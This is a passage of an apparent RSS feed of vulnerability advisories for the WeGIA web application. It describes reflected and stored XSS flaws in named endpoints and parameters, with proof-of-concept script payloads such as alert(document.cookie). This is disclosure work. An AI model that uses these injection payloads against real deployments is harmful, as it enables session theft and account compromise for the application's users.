&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22617&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22617&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;editar_socio.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;socio&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/socio/sistema/editar_socio.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;socio&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;socio&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22617/402265755-9bd2f77d-8a4b-405e-83bd-d87747999dd2.png&amp;#34;
	width=&amp;#34;892&amp;#34;
	height=&amp;#34;293&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22617/402265755-9bd2f77d-8a4b-405e-83bd-d87747999dd2_hu_d4929791eada530f.png 480w, /p/cve-2025-22617/402265755-9bd2f77d-8a4b-405e-83bd-d87747999dd2_hu_3ab5db8d72eac55c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;304&amp;#34;
		data-flex-basis=&amp;#34;730px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22617/402265684-5c5e0611-6699-440d-8e65-d1729f19ab63.png&amp;#34;
	width=&amp;#34;805&amp;#34;
	height=&amp;#34;200&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22617/402265684-5c5e0611-6699-440d-8e65-d1729f19ab63_hu_71f9fc1d6ef51684.png 480w, /p/cve-2025-22617/402265684-5c5e0611-6699-440d-8e65-d1729f19ab63_hu_c9f8d7edc65581d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;402&amp;#34;
		data-flex-basis=&amp;#34;966px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8cp5-vr69-h8xx&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8cp5-vr69-h8xx&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributorscode&amp;#34;&amp;gt;Contributorscode
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22618</title>
        <link>https://www.cvehunters.com/p/cve-2025-22618/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22618/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22618-cross-site-scripting-xss-stored-endpoint-adicionar_cargophp-parameter-cargo&amp;#34;&amp;gt;CVE-2025-22618: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_cargo.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22618&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22618&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_cargo.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parametercode. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22618-cross-site-scripting-xss-stored-endpoint-adicionar_cargophp-parameter-cargo&amp;#34;&amp;gt;CVE-2025-22618: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_cargo.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22618&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22618&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_cargo.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parametercode. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;adicionar_cargo.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22618/402269277-bc3361ca-6e12-482a-a170-a94db8ed495e.png&amp;#34;
	width=&amp;#34;853&amp;#34;
	height=&amp;#34;364&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22618/402269277-bc3361ca-6e12-482a-a170-a94db8ed495e_hu_6a45ce3aa9ecb630.png 480w, /p/cve-2025-22618/402269277-bc3361ca-6e12-482a-a170-a94db8ed495e_hu_196ee94f0359f512.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;234&amp;#34;
		data-flex-basis=&amp;#34;562px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22618/402269279-a461d356-14f1-4517-be79-e9cd112fd6c1.png&amp;#34;
	width=&amp;#34;805&amp;#34;
	height=&amp;#34;222&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22618/402269279-a461d356-14f1-4517-be79-e9cd112fd6c1_hu_8639761381340b0.png 480w, /p/cve-2025-22618/402269279-a461d356-14f1-4517-be79-e9cd112fd6c1_hu_f8134686c8ad53cb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;362&amp;#34;
		data-flex-basis=&amp;#34;870px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2775-42rh-535q&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2775-42rh-535q&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22619</title>
        <link>https://www.cvehunters.com/p/cve-2025-22619/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22619/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22619-cross-site-scripting-xss-reflected-endpoint-editar_permissoesphp-parameter-msg_c&amp;#34;&amp;gt;CVE-2025-22619: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;editar_permissoes.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22619&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22619&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;editar_permissoes.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/geral/editar_permissoes.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
